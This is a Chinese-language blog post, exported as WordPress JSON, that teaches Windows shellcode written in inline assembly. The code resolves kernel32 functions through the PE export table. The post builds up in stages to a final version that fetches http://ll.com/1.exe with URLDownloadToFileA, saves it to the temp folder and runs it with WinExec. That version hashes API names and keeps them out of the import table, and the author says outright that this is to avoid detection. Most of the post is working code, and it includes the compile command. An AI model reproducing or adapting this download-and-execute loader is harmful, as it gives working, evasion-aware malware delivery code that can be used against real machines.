{"id":160,"date":"2020-01-08T01:40:33","date_gmt":"2020-01-07T17:40:33","guid":{"rendered":"http:\/\/blog.73007300.xyz\/?p=160"},"modified":"2020-01-14T18:06:19","modified_gmt":"2020-01-14T10:06:19","slug":"%e7%90%86%e8%a7%a3pe%e6%a0%bc%e5%bc%8f-%e6%89%be%e5%87%ba%e5%af%bc%e5%87%ba%e8%a1%a8export-table%e4%b8%ad%e7%9a%84%e5%87%bd%e6%95%b0%e5%9c%b0%e5%9d%80shellcode%e7%af%87","status":"publish","type":"post","link":"https:\/\/blog.73007300.xyz\/?p=160","title":{"rendered":"\u7406\u89e3PE\u683c\u5f0f\u2014\u627e\u51fa\u5bfc\u51fa\u8868(Export Table)\u4e2d\u7684\u51fd\u6570\u5730\u5740(ShellCode\u7bc7)"},"content":{"rendered":"\n<p>\u672c\u6587\u63a5\u4e0a\u4e00\u7bc7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-han-0-x-7300-039-s-blog\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"G141pRQ9lD\"><a href=\"https:\/\/blog.73007300.xyz\/?p=126\">\u7406\u89e3PE\u683c\u5f0f\u2014\u627e\u51fa\u5bfc\u51fa\u8868(Export Table)\u4e2d\u7684\u51fd\u6570\u5730\u5740(\u7406\u8bba\u7bc7)<\/a><\/blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;\u7406\u89e3PE\u683c\u5f0f\u2014\u627e\u51fa\u5bfc\u51fa\u8868(Export Table)\u4e2d\u7684\u51fd\u6570\u5730\u5740(\u7406\u8bba\u7bc7)&#8221; &#8212; han0x7300&#039;s blog\" src=\"https:\/\/blog.73007300.xyz\/?p=126&#038;embed=true#?secret=K1xoucshHW#?secret=G141pRQ9lD\" data-secret=\"G141pRQ9lD\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p> \u770b\u5b8c\u7406\u8bba\uff0c\u63a5\u7740\u8981\u6765\u5199\u4ee3\u7801\u5b9e\u8df5\u4e00\u4e0b\u3002<br> \u8981\u5b9e\u73b0\u7684\u529f\u80fd\u662f\u901a\u8fc7Inline Assembly \u6253\u5f00 C:\\1.exe <br> \u5148\u8981\u83b7\u53d6kernel32.dll\u5728\u5185\u5b58\u4e2d\u7684\u57fa\u5740\uff0c\u56e0\u4e3akernel32\u4e2d\u6709\u6211\u9700\u8981\u7684\u51fd\u6570\uff0c\u6709\u4e24\u79cd\u65b9\u6cd5\u3002 <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"279\" src=\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/01\/image-29.png\" alt=\"\" class=\"wp-image-162\"\/><figcaption><a href=\"https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\" (opens in a new tab)\">https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html<\/a><\/figcaption><\/figure>\n\n\n\n<p> \u7b2c\u4e00\u79cd\u65b9\u6cd5\uff08https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html\uff09\uff1a <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\txor esi, esi\t\t\t; esi = 0\n    \tmov ebx, [fs:0x30 + esi]  \t; written this way to avoid null bytes\n\tmov ebx, [ebx + 0x0C] \n\tmov ebx, [ebx + 0x14] \n\tmov ebx, [ebx]\t\n\tmov ebx, [ebx]\t\n\tmov ebx, [ebx + 0x10]\t\t; ebx holds kernel32.dll base address 76830000\n\tmov [ebp-8], ebx \t\t; var8 = kernel32.dll base address<\/code><\/pre>\n\n\n\n<p> \u7b2c\u4e8c\u79cd\u65b9\u6cd5\uff08\u52a0\u5bc6\u89e3\u5bc6\u91cc\u7684\u65b9\u6cd5\uff09\uff1a <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\txor\t\tecx, ecx\n\tmov\t\tecx, dword ptr fs:[0x30]\n\tmov\t\tecx, dword ptr [ecx+0x0C]\n\tmov\t\tesi, dword ptr [ecx+0x1C]\nsc_goonKernel:  \n\tmov\t\teax, dword ptr [esi+8] \n\tmov\t\tebx, dword ptr [esi+0x20]            \n\tmov\t\tesi, dword ptr [esi]\n\tcmp\t\tdword ptr [ebx+0x0C], 0x320033 ;\u5224\u65ad\u540d\u79f0\u4e2d\u5b57\u7b2632\u7684unicode\n\tjnz\t\tsc_goonKernel\n\tmov\t\tebx, eax  ;\u83b7\u53d6kernel32\u5730\u5740<\/code><\/pre>\n\n\n\n<p> \u672c\u6587\u91c7\u7528\u7b2c\u4e00\u79cd\u65b9\u6cd5\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"> \u57fa\u7840\u7248ShellCode: <\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;stdio.h>\n#include &lt;windows.h>\n#include &lt;string>\n#include &lt;iostream>\n\n\/*\n ref: https:\/\/idafchev.github.io\/exploit\/2017\/09\/26\/writing_windows_shellcode.html \n*\/\nint main(int argc, char* argv[])\n{\n    std::cout &lt;&lt; \"Let's start\" &lt;&lt; std::endl;\n    DWORD kernel32Adrress,scStart,scEnd,WinExecAddress;\n    int numberOfFunction ;\n    __asm__\n    (\n        \".intel_syntax\\n\\t\"\n    \"start: \\n\\t\"       \n\n        \"push ebp \\n\\t\"\n        \"mov ebp, esp \\n\\t\"\n\n        \"sub    ebp,0x18 \\n\\t\" \/\/ Allocate memory on stack for local variables\n\n        \"push   0x00636578 \\n\\t\" \/\/ \u628a\"C:\\1.exe\"\u4f5c\u4e3a\u53d8\u91cf\u63a8\u5230\u6808\u91cc\uff0c 1.exe\u662f\u8981\u6253\u5f00\u7684\u7a0b\u5e8f\n        \"push   0x456e6957 \\n\\t\"    \/\/  0x00 \u4f5c\u4e3a\u53d8\u91cf\u7684\u7ed3\u675f\u7b26\n        \"mov    [ebp-4], esp \\n\\t\"  \/\/ var4 = \"WinExec\\x00\"\n\n        \"xor esi, esi \\n\\t\"\n        \"mov ebx, [fs:0x30 + esi] \\n\\t\"\n        \"mov ebx, [ebx + 0x0C] \\n\\t\"\n        \"mov ebx, [ebx + 0x14] \\n\\t\"\n        \"mov ebx, [ebx] \\n\\t\"\n        \"mov ebx, [ebx] \\n\\t\"\n        \"mov ebx, [ebx + 0x10] \\n\\t\"\n\n        \"mov eax, [ebx + 0x3C] \\n\\t\" \/\/ RVA of PE signature\n        \"add eax, ebx \\n\\t\" \/\/ Address of PE signature = base address + RVA of PE signature\n        \"mov eax, [eax + 0x78] \\n\\t\" \/\/  RVA of Export Table\n        \"add eax, ebx \\n\\t\" \/\/ Address of Export Table\n        \n        \"mov ecx, [eax + 0x24] \\n\\t\" \/\/ RVA of Ordinal Table\n        \"add ecx, ebx \\n\\t\" \/\/ Address of Ordinal Table\n        \"mov [ebp-0x0C], ecx \\n\\t\" \/\/ var_0C = Address of Ordinal Table\n\n        \"mov edi, [eax + 0x20] \\n\\t\"    \/\/ RVA of Name Pointer Table\n        \"add edi, ebx \\n\\t\"     \/\/ Address of Name Pointer Table\n        \"mov [ebp-0x10], edi \\n\\t\"   \/\/ var_10 = Address of Name Pointer Table\n\n        \"mov edx, [eax + 0x1C] \\n\\t\"    \/\/ RVA of Address Table\n        \"add edx, ebx \\n\\t\"     \/\/ Address of Address Table\n        \"mov [ebp-0x14], edx \\n\\t\" \/\/    var_14 = Address of Address Table\n        \n        \"mov edx, [eax + 0x14] \\n\\t\"    \/\/ Number of exported functions\n\n        \"xor    eax,eax \\n\\t\"   \/\/ function name address index\n\n    \"loop: \\n\\t\"\n        \"mov    edi, [ebp-0x10] \\n\\t\"   \/\/ var_10 = Address of Name Pointer Table\n        \"mov    esi, [ebp-4] \\n\\t\"  \/\/ var4 = \"WinExec\\x00\"\n        \"xor    ecx, ecx \\n\\t\"  \/\/ function name char index\n\n        \"cld \\n\\t\"  \/\/  Clear direction flag,set DF=0 => process strings from left to right.    \n        \"mov    edi,[edi + eax*4] \\n\\t\"  \/\/ next function name RVA \n \n        \"add    edi, ebx \\n\\t\"\n        \"add    cx,8 \\n\\t\"\n        \"repe   cmpsb \\n\\t\" \/\/ Compare the first 8 bytes of strings in \n                        \/\/ esi and edi registers. ZF=1 if equal, ZF=0 if not\n        \"jz found \\n\\t\"\n        \"inc    eax \\n\\t\"\n        \"cmp    eax,edx \\n\\t\"   \/\/check if last function is reached\n        \"jb     loop  \\n\\t\"   \/\/ if not the last -> loop\n        \"add    esp,0x26 \\n\\t\"\n        \"jmp    end \\n\\t\"\n\n    \"found: \\n\\t\"\n        \"mov    ecx, [ebp-0x0C] \\n\\t\" \/\/ var_0C = Address of Ordinal Table\n        \"mov    edx, [ebp-0x14]\\n\\t\"  \/\/ var_14 = Address of Address Table\n\n        \"mov    ax, [ecx + eax*2] \\n\\t\" \/\/ ax = ordinal number = var_0C + (counter * 2)\n        \"mov    eax, [edx + eax*4] \\n\\t\"    \/\/  eax = RVA of function = var_14 + (ordinal * 4)\n        \"mov    %0, eax \\n\\t\"\n        \"add    eax,ebx \\n\\t\"  \/\/  eax = address of WinExec  = kernel32.dll base address + RVA of WinExec\n        \n\n        \"xor    edx,edx \\n\\t\"\n        \"push   edx \\n\\t\"   \/\/ null termination\n        \"push   0x6578652e \\n\\t\"\n        \"push   0x315c3a43 \\n\\t\"\n        \"mov    esi,esp \\n\\t\"\n\n        \"push   10 \\n\\t\"\n        \"push   esi \\n\\t\"\n        \"call   eax \\n\\t\"\n        \n        \"add    esp, 0x46 \\n\\t\"\n        \n    \"end: \\n\\t\"\n\n        :\"=r\" (WinExecAddress)\n        :\"r\" (WinExecAddress)\n        :    \n    );\n    std::cout &lt;&lt; \"The WinExec Address is:\";\n    printf(\"%llx\",WinExecAddress);\n    std::cout &lt;&lt; std::endl;\n\n}\n<\/code><\/pre>\n\n\n\n<p> \u7a0b\u5e8f\u5c31\u662f\u627e\u5230kernel32.dll \u7136\u540e\u627e\u5230\u5bfc\u51fa\u8868\uff0c\u904d\u5386\u627e\u5230Function name Table \u4e2dWinExec\u7684\u4f4d\u7f6e\uff0c<br> \u901a\u8fc7\u8fd9\u4e2a\u4f4d\u7f6e\u627e\u5230Ordinal Table\u4e2d\u6307\u5b9a\u7684index\uff0c\u901a\u8fc7\u8fd9\u4e2aindex\u5728 Address Table\u627e\u5230 WinExec\u7684\u5730\u5740\uff0c\u7136\u540e\u4f20\u53c2\uff0ccall\u8fd9\u4e2a\u5730\u5740\u3002 <\/p>\n\n\n\n<h2 class=\"wp-block-heading\"> <br> \u8fdb\u9636\u7248ShellCode: <\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;stdio.h>\n#include &lt;windows.h>\n#include &lt;string>\n#include &lt;iostream>\n\nint main(int argc, char* argv[])\n{\n    std::cout &lt;&lt; \"Let's start\" &lt;&lt; std::endl;\n    DWORD WinExecAddress=0;\n    __asm__\n    (\n        \".intel_syntax\\n\\t\"\n    \"start:\\n\\t\"      \n        \"xor    ecx, ecx\\n\\t\" \n        \"mov    ebx, fs:[0x30] \\n\\t\"\n        \"mov    ebx, [ebx + 0x0C] \\n\\t\"\n        \"mov    ebx, [ebx + 0x14] \\n\\t\"\n        \"mov    ebx, [ebx] \\n\\t\"\n        \"mov    ebx, [ebx] \\n\\t\"\n        \"mov    ebx, [ebx + 0x10] \\n\\t\"\n\n        \"mov eax, [ebx + 0x3C] \\n\\t\" \/\/ RVA of PE signature\n        \"add eax, ebx \\n\\t\" \/\/ Address of PE signature = base address + RVA of PE signature\n        \"mov eax, [eax + 0x78] \\n\\t\" \/\/  RVA of Export Table\n        \"add eax, ebx \\n\\t\" \/\/ Address of Export Table\n\n        \"push   eax \\n\\t\" \/\/ save \n\n        \"xor    ecx, ecx \\n\\t\"  \/\/ ecx: record how far from first function name\n        \"dec    ecx \\n\\t\" \n        \"mov    esi, [eax + 0x20] \\n\\t\"   \/\/ RVA of Name Pointer Table\n        \"add    esi, ebx \\n\\t\"            \n        \n    \"Find_Loop: \\n\\t\"\n        \n        \"inc    ecx \\n\\t\"   \n        \"lods   dword ptr [esi] \\n\\t\"   \/\/ traverse function name\n        \"add    eax,ebx \\n\\t\"   \/\/ + base address. to get function name Address\n        \"xor    edi, edi \\n\\t\"  \/\/ edi: hashed value\n    \"Hash_Loop: \\n\\t\"\n        \"movsx  edx, byte ptr [eax] \\n\\t\"\n        \"cmp    dl,dh \\n\\t\" \/\/ \/\/ \u51fd\u6570\u540d\u4ee5 00 \u7ed3\u675f\uff0c\u82e5\u53d6\u5230 00 \uff0c\u5219\u8bfb\u5b8c\u4e86\u8fd9\u4e2a\u51fd\u6570\u540d\n        \"je     hash_OK \\n\\t\" \/\/ \u8fd9\u4e2a\u51fd\u6570\u540d\u5df2\u7ecf\u8bfb\u53d6\u5230\u6700\u540e\u4e00\u4f4d\n        \"ror    edi, 7 \\n\\t\"\n        \"add    edi,edx \\n\\t\"   \/\/ \/\/ hash\u8fc7\u7684\u503c \u5b58\u5728 edi\n        \"inc    eax \\n\\t\"\n        \n        \"jmp    Hash_Loop \\n\\t\"\n        \n    \"hash_OK: \\n\\t\"\n        \"cmp    edi, 0x01a22f51 \\n\\t\" \/\/ cmp edi , [ebp-4]\n        \"jnz    Find_Loop \\n\\t\"\n        \"pop    esi \\n\\t\"\n        \"mov    edi, dword ptr [esi+0x24] \\n\\t\"\n        \"add    edi, ebx \\n\\t\"\n        \"mov    cx,word ptr [edi+ecx*2] \\n\\t\" \/\/ Ordinal Table\n        \"mov    edi, dword ptr [esi+0x1c]\\n\\t\" \/\/  RVA of Address Table\n        \"add    edi, ebx \\n\\t\"\n        \"mov    eax, dword ptr [edi+ecx*4] \\n\\t\" \/\/ RVA of function address\n        \"add    eax, ebx \\n\\t\"\n        \"mov    %0, eax \\n\\t\"\n        \n        \"xor    edx,edx \\n\\t\"\n        \"push   edx \\n\\t\"   \/\/ null termination\n        \"push   0x6578652e \\n\\t\"\n        \"push   0x315c3a43 \\n\\t\"\n        \"mov    esi,esp \\n\\t\"\n\n        \"push   10 \\n\\t\"\n        \"push   esi \\n\\t\"\n        \"call   eax \\n\\t\"\n        \n        \"add    esp, 0x46 \\n\\t\"\n        \n    \"end: \\n\\t\"\n\n        : \"=r\" (WinExecAddress)\n        : \"r\" (WinExecAddress)\n        :    \n    );\n    std::cout &lt;&lt; \"The WinExec Address is:\";\n    printf(\"%lx\",WinExecAddress);\n    std::cout &lt;&lt; std::endl;\n}\n<\/code><\/pre>\n\n\n\n<p> \u8fdb\u9636\u7248ShellCode\u7528\u4e86\u52a0\u5bc6\u89e3\u5bc6\u4e2d\u7684Hash\u7b97\u6cd5\u627eFunction Name\uff0c\u9632\u6b62\u88ab\u68c0\u6d4b\u5230\u3002 <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7ec8\u6781\u7248\uff08\u52a0\u5bc6\u89e3\u5bc6\u7248\uff09<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;stdio.h>\n\/\/#include &lt;windows.h>\n\/\/#include &lt;string>\n\/\/#include &lt;iostream>\n\nint main(int argc, char* argv[])\n{\n    \/\/std::cout &lt;&lt; \"Let's start\" &lt;&lt; std::endl;\n    \/\/DWORD WinExecAddress=0;\n\n    \/\/ 1. \u627e\u5230Kernel32\u7684\u57fa\u5740\n    \/\/ 2. \u627e\u5230Kernel32.LoadLibrary\n    \/\/ 3. \u52a0\u8f7durlmon.dll\n    \/\/ 4. \u627e\u5230urlmon\u7684API\n    \/\/ 5. \u8c03\u7528\u51fd\u6570\n    __asm__\n    (\n        \".intel_syntax\\n\\t\"\n        \n        \/\/ hash value\n        \"push   0x00657865 \\n\\t\"\n        \"push   0x2e312f6d \\n\\t\"\n        \"push   0x6f632e6c \\n\\t\"\n        \"push   0x6c2f2f3a \\n\\t\"\n        \"push   0x70747468 \\n\\t\"    \/\/ http:\/\/ll.com\/1.exe  \/\/ map hosts: C:\\Windows\\System32\\drivers\\etc\\hosts\n        \"push   0x00000000 \\n\\t\"    \/\/ Address of Download file path\n        \"push   0x9aafd680 \\n\\t\" \/\/ Urlmon.URLDownloadToFileA\n        \"push   0x6118f28f \\n\\t\" \/\/ Kernel32.TerminateProcess\n        \"push   0xcb9765a0 \\n\\t\" \/\/ Kernel32.Sleep\n        \"push   0x01a22f51 \\n\\t\" \/\/ Kernel32.WinExec\n        \"push   0x837de239 \\n\\t\" \/\/ Kernel32.GetTempPathA\n        \"push   0x6144aa05 \\n\\t\" \/\/ Kernel32.VirtualFree\n        \"push   0x1ede5967 \\n\\t\" \/\/ Kernel32.VirtualAlloc\n\n        \"mov    ebp, esp \\n\\t\"\n\n        \/\/  1. \u627e\u5230Kernel32\u7684\u57fa\u5740\n    \"BaseAddress:\\n\\t\"      \n        \"xor    ecx, ecx\\n\\t\" \n        \"mov    ebx, fs:[0x30] \\n\\t\"\n        \"mov    ebx, [ebx + 0x0C] \\n\\t\"\n        \"mov    ebx, [ebx + 0x14] \\n\\t\"\n        \"mov    ebx, [ebx] \\n\\t\"\n        \"mov    ebx, [ebx] \\n\\t\"\n        \"mov    ebx, [ebx + 0x10] \\n\\t\" \/\/ ebx: Base Address of Kernel32.dll\n        \"mov    ebp, esp \\n\\t\"\n        \/\/\"int 3\\n\\t\"\n        \n        \/\/ 2. \u627e\u5230Kernel32.LoadLibrary\n        \/*\n        \/\/ \u53c2\u6570\uff1aebx\uff0c .dll Base Address\n        \/\/ \u53c2\u6570\uff1aedi, API\u7684Hash\u503c\n        \/\/ \u53c2\u6570\uff1aecx, dll\u4e2d\u8981\u627e\u7684API\u6570\u91cf\n                \n        \u7528ecx \u548c loop\u6765\u63a7\u5236\u67e5\u627e\u7684\u6b21\u6570\n        Kernel32\u4e2d\u9700\u8981\u7528\u52307\u4e2aAPI\uff0c\u6240\u4ee5\u8fd9\u91ccecx\u8d4b\u503c7\n        *\/  \n        \"mov    ebp, esp \\n\\t\" \n        \"mov    ecx, 0x07 \\n\\t\"  \n        \"mov    edi, ebp \\n\\t\"\n\n    \"FindApi_loop: \\n\\t\"\n        \/\/ Find Kernel32API\n        \"call   FindApi \\n\\t\"\n        \"loop   FindApi_loop \\n\\t\"\n        \/\/ LoadLibraryA load urlmon.dll\n        \/\/ now edi is point to last hashed value\n        \"push   0x6e6f \\n\\t\"\n        \"push   0x6d6c7275 \\n\\t\"\n        \"mov    eax,esp \\n\\t\"\n        \"push   eax \\n\\t\"\n        \"call   dword ptr[ebp] \\n\\t\"\n        \"mov    ebx, eax \\n\\t\" \/\/ ebx is image base address of urlmon.dll\n        \"pop    eax \\n\\t\"\n        \"pop    eax \\n\\t\"\n\n        \"call   FindApi \\n\\t\"\n\n        \"nop \\n\\t\"\n        \"nop \\n\\t\"\n        \"nop \\n\\t\"\n\n        \"jmp    start_use_function \\n\\t\"\n        \"nop \\n\\t\"\n\n    \"FindApi: \\n\\t\"\n        \"push   ecx \\n\\t\" \/\/ ecx\u7b49\u4e0b\u8981\u88ab\u7528\u4f5c\u904d\u5386function name\n        \"push   ebp \\n\\t\"\n\n        \/\/\"int 3\\n\\t\"\n        \"mov eax, [ebx + 0x3C] \\n\\t\" \/\/ RVA of PE signature\n        \"add eax, ebx \\n\\t\" \/\/ Address of PE signature = base address + RVA of PE signature\n        \"mov eax, [eax + 0x78] \\n\\t\" \/\/  RVA of Export Table\n        \"add eax, ebx \\n\\t\" \/\/ Address of Export Table\n\n        \"push   eax \\n\\t\" \/\/ save \n\n        \"xor    ecx, ecx \\n\\t\"  \/\/ ecx: record how far from first function name\n        \"dec    ecx \\n\\t\" \n        \"mov    esi, [eax + 0x20] \\n\\t\"   \/\/ RVA of Name Pointer Table\n        \"add    esi, ebx \\n\\t\"            \n        \n    \"Find_Loop: \\n\\t\"\n        \n        \"inc    ecx \\n\\t\"   \n        \"lods   dword ptr [esi] \\n\\t\"   \/\/ traverse function name\n        \"add    eax,ebx \\n\\t\"   \/\/ + base address. to get function name Address\n        \"xor    ebp, ebp \\n\\t\"  \/\/ ebp: hashed value\n    \"Hash_Loop: \\n\\t\"\n        \"movsx  edx, byte ptr [eax] \\n\\t\"\n        \"cmp    dl,dh \\n\\t\" \/\/ \/\/ \u51fd\u6570\u540d\u4ee5 00 \u7ed3\u675f\uff0c\u82e5\u53d6\u5230 00 \uff0c\u5219\u8bfb\u5b8c\u4e86\u8fd9\u4e2a\u51fd\u6570\u540d\n        \"je     hash_OK \\n\\t\" \/\/ \u8fd9\u4e2a\u51fd\u6570\u540d\u5df2\u7ecf\u8bfb\u53d6\u5230\u6700\u540e\u4e00\u4f4d\n        \"ror    ebp, 7 \\n\\t\"\n        \"add    ebp,edx \\n\\t\"   \/\/ \/\/ hash\u8fc7\u7684\u503c \u5b58\u5728 ebp\n        \"inc    eax \\n\\t\"\n        \n        \"jmp    Hash_Loop \\n\\t\"\n        \n    \"hash_OK: \\n\\t\"\n        \n        \"cmp    ebp, dword ptr [edi] \\n\\t\" \n        \"jnz    Find_Loop \\n\\t\"\n        \"pop    esi \\n\\t\"\n        \"mov    ebp, dword ptr [esi+0x24] \\n\\t\"\n        \"add    ebp, ebx \\n\\t\"\n        \/\/\"int 3\\n\\t\"\n        \"mov    cx,word ptr [ebp+ecx*2] \\n\\t\" \/\/ Ordinal Table\n        \"mov    ebp, dword ptr [esi+0x1c]\\n\\t\" \/\/  RVA of Address Table\n        \"add    ebp, ebx \\n\\t\"\n        \"mov    eax, dword ptr [ebp+ecx*4] \\n\\t\" \/\/ RVA of function address\n        \"add    eax, ebx \\n\\t\"\n        \"stos   dword ptr es:[edi] \\n\\t\" \/\/ put eax to edi pointed value,then edi increase 4 bytes . So ebp first 4 bytes saveed first function address\n        \"pop    ebp \\n\\t\"\n        \"pop    ecx \\n\\t\"      \n        \"ret\\n\\t\"\n        \n    \"start_use_function: \\n\\t\"\n        \/* from now , you can invoke that 8 function through \"dword ptr [ebp]\"\n\n            dword ptr[ebp+0x0] :   Kernel32.LoadLibraryA\n            dword ptr[ebp+0x4] :   Kernel32.VirtualAlloc\n            dword ptr[ebp+0x8] :   Kernel32.VirtualFree\n            dword ptr[ebp+0xc] :   Kernel32.GetTempPathA\n            dword ptr[ebp+0x10] :  Kernel32.WinExec\n            dword ptr[ebp+0x14] :  Kernel32.Sleep\n            dword ptr[ebp+0x18] :  Kernel32.TerminateProcess\n            dword ptr[ebp+0x1c] :  Urlmon.URLDownloadToFileA\n\n         *\/      \n        \/*\n             Open C:\\1.exe\n            \"push   0x00 \\n\\t\"   \/\/ null termination\n            \"push   0x6578652e \\n\\t\"\n            \"push   0x315c3a43 \\n\\t\"\n            \"mov    esi,esp \\n\\t\"\n\n            \"push   10 \\n\\t\"\n            \"push   esi \\n\\t\"\n            \"call   dword ptr [ebp+0x10] \\n\\t\"\n            \"pop    eax \\n\\t\"   \/\/ \u5e73\u8861\u6808\n            \"pop    eax\\n\\t\"\n            \"pop    eax\\n\\t\"\n            \"pop    eax\\n\\t\"\n            \"pop    eax\\n\\t\"\n\n        *\/\n\n        \/*\n            Set Download path\n        *\/\n        \"push    0x40 \\n\\t\"\n        \"push    0x1000 \\n\\t\"\n        \"push    0x100 \\n\\t\"\n        \"push    0 \\n\\t\"\n        \"call    dword ptr [ebp+0x4] \\n\\t\"  \/\/  kernel32.VirtualAlloc\n        \"mov     dword ptr [ebp+0x20], eax \\n\\t\"\n        \/\/\u83b7\u53d6\u4e34\u65f6\u6587\u4ef6\u5939\u8def\u5f84\n        \"push   eax \\n\\t\"\n        \"push   0x100 \\n\\t\"\n        \"call   dword ptr [ebp+0x0c] \\n\\t\"  \/\/Kernel32.GetTempPathA\n        \/\/\u8bbe\u7f6e\u4e34\u65f6exe\u6587\u4ef6\u8def\u5f84\n        \/\/%TEMP%\\1.exe\n        \"mov    ecx, dword ptr[ebp+0x20] \\n\\t\"\n        \"add    ecx, eax \\n\\t\"\n        \"mov    dword ptr[ecx], 0x78652e31 \\n\\t\"\n        \"mov    dword ptr[ecx+0x4], 0x0065 \\n\\t\"\n        \"mov    dword ptr[ecx+0x8], 0 \\n\\t\"\n        \/*\n            download file\n        *\/\n    \"try_Download: \\n\\t\"\n        \"push   0 \\n\\t\"\n        \"push   0 \\n\\t\"\n        \"push   dword ptr[ebp+0x20] \\n\\t\"\n        \"lea    eax, dword ptr[ebp+0x24] \\n\\t\"\n        \"push   eax \\n\\t\"\n        \"push   0 \\n\\t\"\n        \"call   dword ptr[ebp+0x1c] \\n\\t\"   \/\/urlmon.URLDowanloadToFileA\n        \"test   eax, eax \\n\\t\"\n        \"jz     Download_OK \\n\\t\"\n        \"push   30000 \\n\\t\"\n        \"call   dword ptr[ebp+0x14] \\n\\t\"   \/\/Kernel32.Sleep\n        \"jmp    try_Download \\n\\t\"\n        \n    \"Download_OK: \\n\\t\"\n        \"push   0 \\n\\t\"\n        \"push   dword ptr[ebp+0x20] \\n\\t\"\n        \"call   dword ptr[ebp+0x10] \\n\\t\"    \/\/Kernel32.WinExec\n\n        \"push    0x08000 \\n\\t\"\n        \"push    0x00 \\n\\t\"\n        \"push    dword ptr [ebp+0x20] \\n\\t\"\n        \"call    dword ptr [ebp+0x08] \\n\\t\" \/\/kernel32.VirtualFree\n\n        \/\/\"mov    %0, eax \\n\\t\"   \/\/ test code\n\n        \"push   0 \\n\\t\"\n        \"push   0x0FFFFFFFF \\n\\t\"\n        \"call   dword ptr[ebp+0x18] \\n\\t\"\n\n        \/*\n        : \"=r\" (WinExecAddress)\n        : \"r\" (WinExecAddress)\n        :   \n        *\/ \n    );\n    \/\/ if 1.exe was success download and excute, this will not run:\n    \/*\n    std::cout &lt;&lt; \"The WinExec Address is:\";\n    printf(\"%lx\",WinExecAddress);\n    std::cout &lt;&lt; std::endl;\n    *\/\n}\n<\/code><\/pre>\n\n\n\n<p>\u7a0b\u5e8f\u7684\u529f\u80fd\u662f\u4ecehttp:\/\/ll.com\/1.exe\u4e0b\u8f7d\u5e76\u6267\u884c\u3002ll.com\u53ef\u4ee5\u5728etc\\hosts\u91cc\u505a\u6620\u5c04\u3002<\/p>\n\n\n\n<p>\u53ea\u662f\u6838\u5fc3\u4ee3\u7801\u7684\u601d\u8def\u548c\u52a0\u5bc6\u89e3\u5bc6\u4e00\u6837\uff0c\u533a\u522b\u662f\u6211\u628a\u6570\u636e\u76f4\u63a5\u5728\u6c47\u7f16\u4ee3\u7801\u91ccpush\u4e86\u3002<br> \u5148\u83b7\u53d67\u4e2aKernel32\u7684\u51fd\u6570\u5730\u5740\uff0c\u518d\u83b7\u53d6Urlmon\u7684\u51fd\u6570\u5730\u5740\uff0c\u653e\u5230\u6808\u91cc\uff0c\u6700\u540e\u901a\u8fc7ebp\u8c03\u7528\u6240\u9700\u8981\u7684\u51fd\u6570\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>  \u7f16\u8bd1\uff08MinGW\uff09\uff1a <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>g++.exe .\\shellcode.cpp -o shellcode -masm=intel  -static-libgcc -static-libstdc++<\/code><\/pre>\n\n\n\n<p> \u5173\u4e8e\u8fd9\u91cc\u7684Hash\u7b97\u6cd5\u53ef\u4ee5\u53c2\u8003\u8fd9\u7bc7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-han-0-x-7300-039-s-blog\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"c48HZj70Dl\"><a href=\"https:\/\/blog.73007300.xyz\/?p=114\">Hash Function Name In Shellcode<\/a><\/blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8220;Hash Function Name In Shellcode&#8221; &#8212; han0x7300&#039;s blog\" src=\"https:\/\/blog.73007300.xyz\/?p=114&#038;embed=true#?secret=d2QqLd5voe#?secret=c48HZj70Dl\" data-secret=\"c48HZj70Dl\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>\u7528PEstudio\u67e5\u770b\u7ec8\u6781\u7248\u7f16\u8bd1\u51fa\u7684\u7a0b\u5e8f\uff0c\u53ef\u4ee5\u770b\u5230Import table\u91cc\u6ca1\u6709\u8bb0\u5f55\u76f8\u5173\u7684\u51fd\u6570\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"605\" height=\"496\" src=\"https:\/\/blog.73007300.xyz\/wp-content\/uploads\/2020\/01\/image-31.png\" alt=\"\" class=\"wp-image-167\"\/><\/figure>\n\n\n\n<p>\u4ece\u800c\u66f4\u52a0\u9690\u853d\u3002<\/p>\n\n\n\n<p> 